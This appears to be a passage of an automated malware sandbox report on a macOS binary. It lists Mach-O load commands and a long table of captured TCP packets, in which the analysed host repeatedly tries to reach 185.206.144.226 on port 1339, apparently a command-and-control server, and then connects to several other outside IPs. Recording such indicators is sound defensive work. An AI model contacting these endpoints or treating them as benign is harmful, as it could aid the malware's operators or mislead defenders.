    Data@rpath/libswiftQuartzCore.dylib
    dylib_command
    NameValue
    compatibility_version0.1.0
    timestampThu Jan 01 01:00:02 1970
    name24
    current_version48.134.3
    Data@rpath/libswiftXPC.dylib
    rpath_command
    NameValue
    path12
    Data@executable_path/../Frameworks
    linkedit_data_command
    NameValue
    dataoff450760
    datassize1112
    linkedit_data_command
    NameValue
    dataoff451872
    datassize16
    linkedit_data_command
    NameValue
    dataoff472672
    datassize16000

    Network Behavior

    Network Port Distribution

    TCP Packets

    TimestampSource PortDest PortSource IPDest IP
    Nov 2, 2018 10:58:31.855746031 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:32.858304024 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:33.861527920 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:34.863781929 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:35.864779949 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:36.865881920 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:38.869340897 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:42.873346090 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:58:50.888906956 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:59:06.928991079 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:59:38.955190897 MEZ492391339192.168.0.50185.206.144.226
    Nov 2, 2018 10:59:49.343641996 MEZ5812453192.168.0.508.8.8.8
    Nov 2, 2018 10:59:49.370820999 MEZ53581248.8.8.8192.168.0.50
    Nov 2, 2018 10:59:49.422260046 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:49.527764082 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:49.527986050 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.071696043 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.178833961 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.179042101 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.179255009 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.179306030 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.179403067 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.228516102 MEZ5907053192.168.0.508.8.8.8
    Nov 2, 2018 10:59:50.229161978 MEZ6318453192.168.0.508.8.8.8
    Nov 2, 2018 10:59:50.244560003 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.259983063 MEZ53590708.8.8.8192.168.0.50
    Nov 2, 2018 10:59:50.261522055 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.266331911 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.266519070 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.266911030 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.271600008 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.274561882 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.274784088 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.274899006 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.275012970 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.275043964 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.275110006 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.275188923 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.419601917 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.450742960 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.455692053 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.455782890 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.455883980 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.455946922 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.525387049 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.525628090 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.526210070 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.573832035 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.573868036 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.573915005 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.573978901 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.574054956 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.579080105 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.579185009 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.579221010 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.579338074 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.668004990 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668102980 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668239117 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668260098 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668317080 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.668385983 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668457031 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.668503046 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668612003 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668726921 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668840885 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.668937922 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.668945074 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.668956995 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.669125080 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.669368982 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.669636011 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.737797022 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.737884998 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738020897 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738040924 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738095999 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.738166094 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738184929 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738233089 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.738306046 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738342047 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.738420010 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738445997 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738461971 MEZ44349241104.20.13.48192.168.0.50
    Nov 2, 2018 10:59:50.738606930 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.738682985 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.738689899 MEZ49241443192.168.0.50104.20.13.48
    Nov 2, 2018 10:59:50.754837990 MEZ53631848.8.8.8192.168.0.50
    Nov 2, 2018 10:59:50.756460905 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:50.774291992 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.774403095 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.774518013 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.774631977 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.774713993 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.774754047 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.774864912 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.774903059 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.774979115 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775077105 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.775093079 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775209904 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775290966 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.775330067 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775440931 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775528908 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.775556087 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775738955 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.775787115 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.775899887 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776012897 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776103973 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.776132107 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776245117 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776314974 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.776360989 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776474953 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776547909 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.776592016 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.776690006 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.776948929 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.777241945 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.777507067 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.777780056 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.778141975 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.778418064 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.881417990 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.881658077 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.881771088 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.881886005 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.881994963 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.882000923 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882117033 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882134914 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.882239103 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882335901 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.882353067 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882469893 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882582903 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882698059 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.882704973 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.882817030 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.882925987 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883035898 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883128881 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.883158922 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883270025 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883331060 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.883383989 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883533955 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.883553982 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883670092 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883774042 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.883783102 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883836985 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.883903980 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.883954048 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884082079 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.884109020 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884193897 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.884285927 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884306908 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.884344101 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884423018 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.884536028 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.884548903 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884613991 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884650946 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.884704113 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884856939 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.884998083 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.885109901 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.885245085 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.885307074 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.885339975 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.885581970 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.885673046 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.885785103 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.885874033 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.885971069 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.988306046 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.988544941 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.988651991 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.988751888 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.988765955 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.988868952 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.988883018 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.988997936 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.989007950 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989017963 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989170074 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989233971 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989283085 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.989523888 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.989609957 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989646912 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.989754915 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.989778042 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989837885 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989871979 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.989907980 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.989984989 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990046978 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990103006 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990200996 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990215063 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990330935 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990350008 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990418911 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990442038 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990521908 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990559101 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990654945 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990674973 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990767956 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990793943 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.990875959 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.990911961 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.991019964 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.991044044 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.991106033 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.991137981 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.991173029 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.991249084 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.991312981 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.991461992 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.991753101 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.991867065 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.991960049 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.991986990 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992069960 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992105961 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992182970 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992218971 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992289066 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992325068 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992441893 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992451906 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992538929 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992557049 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992672920 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992677927 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992764950 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992789030 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992870092 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.992906094 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.992983103 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993017912 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993133068 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993146896 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993228912 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993246078 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993295908 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993364096 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993475914 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993482113 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993552923 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993591070 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993659973 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993710041 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993808031 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993822098 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.993908882 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.993944883 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:50.994007111 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.994173050 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.994376898 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.994592905 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.994848967 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:50.995157957 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.034432888 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.034831047 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.035511017 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.095354080 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.095674038 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.096625090 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.096858978 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.096910000 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.097089052 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.097104073 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.097206116 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.097292900 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.097323895 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.097405910 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.097434044 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.097460985 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.097553968 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.097629070 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.097636938 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.202722073 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.202945948 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.203027964 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.203205109 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.203392029 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.203689098 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.203886986 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.204111099 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.204338074 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.204530954 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.204750061 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.211015940 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.211267948 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.211569071 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.211786985 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.212064981 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.212356091 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.212646961 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.212872028 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.213179111 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.213471889 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.213715076 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.213953972 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.214184046 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.214436054 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.215749979 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.216706038 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.313358068 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.314634085 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.314872980 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.315047979 MEZ44349242133.130.107.154192.168.0.50
    Nov 2, 2018 10:59:51.315144062 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.315206051 MEZ49242443192.168.0.50133.130.107.154
    Nov 2, 2018 10:59:51.321496964 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.321623087 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.321688890 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.321748018 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.322783947 MEZ44349240192.30.253.112192.168.0.50
    Nov 2, 2018 10:59:51.322935104 MEZ49240443192.168.0.50192.30.253.112
    Nov 2, 2018 10:59:51.382724047 MEZ6534753192.168.0.508.8.8.8
    Nov 2, 2018 10:59:51.383797884 MEZ5957653192.168.0.508.8.8.8
    Nov 2, 2018 10:59:51.412254095 MEZ53653478.8.8.8192.168.0.50
    Nov 2, 2018 10:59:51.413224936 MEZ4924380192.168.0.5023.10.249.171
    Nov 2, 2018 10:59:51.415460110 MEZ53595768.8.8.8192.168.0.50
    Nov 2, 2018 10:59:51.417916059 MEZ804924323.10.249.171192.168.0.50
    Nov 2, 2018 10:59:51.418082952 MEZ4924380192.168.0.5023.10.249.171
    Nov 2, 2018 10:59:51.418445110 MEZ4924380192.168.0.5023.10.249.171
    Nov 2, 2018 10:59:51.422926903 MEZ804924323.10.249.171192.168.0.50
    Nov 2, 2018 10:59:51.455786943 MEZ804924323.10.249.171192.168.0.50
    Nov 2, 2018 10:59:51.455801010 MEZ804924323.10.249.171192.168.0.50
    Nov 2, 2018 10:59:51.456047058 MEZ4924380192.168.0.5023.10.249.171
    Nov 2, 2018 10:59:51.456060886 MEZ4924380192.168.0.5023.10.249.171
